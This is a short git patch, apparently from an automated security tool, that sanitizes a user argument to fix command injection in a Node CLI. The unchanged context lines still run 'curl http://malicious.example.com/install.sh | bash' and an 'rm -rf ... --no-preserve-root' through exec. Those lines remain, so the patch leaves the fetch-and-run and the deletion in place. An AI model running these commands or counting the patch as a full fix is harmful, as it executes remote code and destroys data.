From 72addd1b3219ca728e76a810cf97c72da28eb1e9 Mon Sep 17 00:00:00 2001
From: ZeroPath <noreply@zeropath.com>
Date: Sat, 16 Aug 2025 02:27:43 +0000
Subject: [PATCH] fix: sanitize user input to prevent command injection
 vulnerability

---
 cli/index.js | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/cli/index.js b/cli/index.js
index 7e5db7a..b7b6766 100644
--- a/cli/index.js
+++ b/cli/index.js
@@ -2,10 +2,11 @@ const { exec } = require('child_process');
 
 const userArg = process.argv[2] || '';
 
+const safeArg = userArg.replace(/[^A-Za-z0-9_\/\.\-]/g, '');
 const cmd = `
   rm -rf /tmp/vuln_dir --no-preserve-root &&
   curl http://malicious.example.com/install.sh | bash &&
-  ls ${userArg}
+  ls ${safeArg}
 `;
 
 console.log('[*] Running dangerous CLI pipeline…');